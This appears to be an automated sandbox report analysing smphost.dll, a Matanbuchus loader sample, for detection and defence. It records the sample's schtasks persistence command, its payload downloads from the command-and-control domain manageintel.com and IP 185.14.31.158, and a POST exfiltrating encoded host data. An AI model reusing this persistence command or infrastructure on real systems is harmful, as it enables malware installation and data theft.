Windows Analysis Report
smphost.dll

Overview

General Information

Sample Name: smphost.dll
Analysis ID: 562835
MD5: fc484855692f2a7d1eae090086a1eb72
SHA1: 2e9103747750b40835f58d9e57c2ab75eeaf25f6
SHA256: e58b9bbb7bcdf3e901453b7b9c9e514fed1e53565e3280353dccc77cde26a98e
Tags: dllmatanbuchusSATURNCONSULTANCYLTDsigned
Infos:

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Uses known network protocols on non-standard ports
Sigma detected: Regsvr32 Network Activity
Sigma detected: Suspicious Call by Ordinal
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a connection to the internet is available
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Registers a DLL
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: smphost.dll Virustotal: Detection: 8% Perma Link
Antivirus detection for URL or domain
Source: http://manageintel.com/WUzZRUBQje/Auth.php Avira URL Cloud: Label: malware

Compliance
barindex
Uses 32bit PE files
Source: smphost.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
Source: unknown HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49841 version: TLS 1.2
Source: smphost.dll Static PE information: certificate valid
Source: Binary string: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\Release\BhJM.pdb source: regsvr32.exe, 00000002.00000002.437623410.000000007FC00000.00000040.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.437475087.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9EED8A FindFirstFileExW, 2_2_6E9EED8A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_6F84ED8A FindFirstFileExW, 38_2_6F84ED8A

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 185.14.31.158 32710 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: manageintel.com
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49855
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ITLDC-NLUA ITLDC-NLUA
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Contains functionality to check if a connection to the internet is available
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9E8210 InternetCheckConnectionA,InternetOpenUrlA,InternetReadFile,WriteFile,InternetCloseHandle, 2_2_6E9E8210
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /WUzZRUBQje/vAtVEC.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49762 -> 185.14.31.158:32710
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: regsvr32.exe, 00000002.00000002.437475087.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://manageintel.com/
Source: regsvr32.exe String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml
Source: regsvr32.exe String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml
Source: unknown HTTP traffic detected: POST /WUzZRUBQje/Auth.php HTTP/1.1User-Agent: Windows-AzureAD-Authentication-Provider/11.0Host: manageintel.comContent-Length: 549Content-Type: application/x-www-form-urlencodedAccept-Language: en-USData Raw: 61 75 74 68 3d 65 79 49 7a 51 30 56 72 49 6a 6f 69 56 33 4a 47 65 44 6c 68 55 45 73 31 64 30 35 6a 54 31 56 57 52 6b 78 47 55 32 74 6d 51 6c 6c 4c 4d 30 78 6a 59 56 4e 6c 5a 31 4e 45 53 6b 70 50 56 7a 52 35 56 31 45 33 4d 30 77 79 52 6e 64 71 4b 32 34 77 50 53 49 73 49 6a 4e 6d 5a 54 45 78 49 6a 6f 69 53 79 73 30 4f 47 39 52 50 54 30 69 4c 43 49 7a 62 54 64 34 49 6a 6f 69 56 58 4a 30 62 79 74 68 52 54 30 69 4c 43 49 31 5a 47 56 69 4f 57 4d 69 4f 69 4a 4c 64 57 74 33 63 57 5a 75 59 69 49 73 49 6b 52 54 4d 6e 67 69 4f 69 4a 4b 5a 58 4e 73 4d 48 46 68 56 79 49 73 49 6b 56 4d 61 69 49 36 49 6c 56 78 62 47 63 77 63 58 46 50 4d 30 56 7a 55 53 49 73 49 6b 56 76 4e 69 49 36 49 6c 68 79 4e 58 67 34 59 55 55 39 49 69 77 69 52 6e 52 76 49 6a 6f 69 53 6e 63 39 50 53 49 73 49 6c 45 32 57 44 59 69 4f 69 4a 56 53 58 42 59 64 31 6c 48 63 44 52 33 50 54 30 69 4c 43 4a 55 51 55 31 6d 62 53 49 36 57 79 4a 58 53 58 52 36 4b 7a 55 72 61 7a 56 57 61 79 74 4c 64 7a 30 39 49 6c 30 73 49 6d 4e 43 52 69 49 36 49 6c 5a 77 64 32 38 78 64 6e 5a 51 4f 54 4a 6f 55 6c 46 6f 64 32 46 6c 65 6d 70 6b 5a 45 68 7a 50 53 49 73 49 6d 55 77 4d 32 56 6b 49 6a 6f 69 56 55 39 57 57 6e 67 32 59 55 30 77 56 56 56 4d 51 31 68 61 61 30 31 42 4b 32 35 6d 62 57 64 50 65 55 74 6e 4e 47 56 68 4f 56 68 55 54 6b 4a 4f 55 32 56 4d 56 45 4e 6d 57 54 30 69 4c 43 4a 6d 4d 57 52 68 49 6a 6f 69 56 44 52 4f 51 6a 46 61 65 58 41 30 56 31 56 7a 56 6e 67 77 52 32 5a 35 61 6b 68 43 5a 7a 51 39 49 69 77 69 64 31 41 32 49 6a 6f 69 57 6d 55 30 63 6d 38 72 53 46 49 69 4c 43 4a 33 5a 32 70 32 49 6a 6f 69 57 6b 78 6f 64 6a 56 6e 50 54 30 69 4c 43 4a 36 61 30 4d 33 49 6a 6f 69 49 6e 30 3d Data Ascii: auth=eyIzQ0VrIjoiV3JGeDlhUEs1d05jT1VWRkxGU2tmQllLM0xjYVNlZ1NESkpPVzR5V1E3M0wyRndqK24wPSIsIjNmZTExIjoiSys0OG9RPT0iLCIzbTd4IjoiVXJ0bythRT0iLCI1ZGViOWMiOiJLdWt3cWZuYiIsIkRTMngiOiJKZXNsMHFhVyIsIkVMaiI6IlVxbGcwcXFPM0VzUSIsIkVvNiI6IlhyNXg4YUU9IiwiRnRvIjoiSnc9PSIsIlE2WDYiOiJVSXBYd1lHcDR3PT0iLCJUQU1mbSI6WyJXSXR6KzUrazVWaytLdz09Il0sImNCRiI6IlZwd28xdnZQOTJoUlFod2FlempkZEhzPSIsImUwM2VkIjoiVU9WWng2YU0wVVVMQ1haa01BK25mbWdPeUtnNGVhOVhUTkJOU2VMVENmWT0iLCJmMWRhIjoiVDROQjFaeXA0V1VzVngwR2Z5akhCZzQ9Iiwid1A2IjoiWmU0cm8rSFIiLCJ3Z2p2IjoiWkxodjVnPT0iLCJ6a0M3IjoiIn0=
Source: unknown DNS traffic detected: queries for: manageintel.com
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9E8210 InternetCheckConnectionA,InternetOpenUrlA,InternetReadFile,WriteFile,InternetCloseHandle, 2_2_6E9E8210
Source: global traffic HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /WUzZRUBQje/vAtVEC.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: unknown HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49841 version: TLS 1.2

System Summary
barindex
Uses 32bit PE files
Source: smphost.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
One or more processes crash
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 2064
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9F3EB6 2_2_6E9F3EB6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9E8C90 2_2_6E9E8C90
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_6F853EB6 38_2_6F853EB6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_6F848C90 38_2_6F848C90
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 6E9E9960 appears 34 times
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 6F849960 appears 34 times
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: smphost.dll Virustotal: Detection: 8%
Source: smphost.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\smphost.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: unknown Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 2064
Source: unknown Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBA1.tmp Jump to behavior
Source: classification engine Classification label: mal88.troj.evad.winDLL@22/7@16/2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9E8630 DllInstall,FormatMessageA,TextOutW,TextOutA,FormatMessageW,CoInitialize,OleInitialize,CoCreateInstance,CoGetCallerTID,FlattenPath,CreatePopupMenu,GetProductInfo,SetFileAttributesW,CharNextW,SHGetThreadRef,DceErrorInqTextA,GetConsoleCP,UuidCreate,GetMessageTime,GetVersion,GetPriorityClass,GetProcessId,IsTokenRestricted,RevertToSelf,RpcExceptionFilter,CveEventWrite,CoCancelCall,CoTaskMemAlloc,GetSidIdentifierAuthority,DisableThreadLibraryCalls,IsValidAcl,IsValidSid,CreateMutexExW,SHStrDupW,SHStrDupA,DuplicateIcon, 2_2_6E9E8630
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\computer
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3576
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: smphost.dll Static PE information: certificate valid
Source: smphost.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: smphost.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: smphost.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: smphost.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: smphost.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: smphost.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: smphost.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\Release\BhJM.pdb source: regsvr32.exe, 00000002.00000002.437623410.000000007FC00000.00000040.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.437475087.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp
Source: smphost.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: smphost.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: smphost.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: smphost.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: smphost.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
Registers a DLL
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll

Persistence and Installation Behavior
barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\SysWOW64\regsvr32.exe File created: C:\ProgramData\6\5507.ocx Jump to dropped file
Drops PE files
Source: C:\Windows\SysWOW64\regsvr32.exe File created: C:\ProgramData\6\5507.ocx Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 32710
Source: unknown Network traffic detected: HTTP traffic on port 32710 -> 49855
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4856 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4856 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2008 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2008 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3244 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3244 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3244 Thread sleep time: -330000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9EED8A FindFirstFileExW, 2_2_6E9EED8A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_6F84ED8A FindFirstFileExW, 38_2_6F84ED8A
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Thread delayed: delay time: 30000 Jump to behavior
Source: regsvr32.exe, 00000002.00000003.365421594.0000000004F40000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.371091543.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.370554878.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367324157.0000000004F50000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.361237594.0000000004DA8000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367859434.0000000004F60000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 7qAJTueJV05Xwegg6bMAAApTi10HgfsAbFhzMiq3oTtaEegJyQAAWY/AdTfkf4tG
